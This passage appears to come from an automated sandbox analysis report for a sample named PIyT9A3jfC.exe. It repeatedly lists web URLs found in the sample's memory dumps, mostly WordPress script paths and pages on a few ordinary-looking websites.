                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/core.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-blind.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-fold.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-highlight.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect-slide.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/effect.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/jquery/ui/slider.min.js?ver=1.12.1
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711712128.0000000008200000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.719328991.0000000003F00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600219649.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.597343850.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.621394183.00000000076D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/z
                  Source: PIyT9A3jfC.exe, 00000001.00000002.891485243.0000000004D9D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000002.894106313.0000000007769000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.00000000013F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/%O
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/k
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.00000000076D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/n
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/rs;
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/s
                  Source: PIyT9A3jfC.exe, 00000001.00000003.584136385.000000000137D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/up4
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702889858.000000000138A000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714841483.000000000138B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702693462.0000000001445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/S
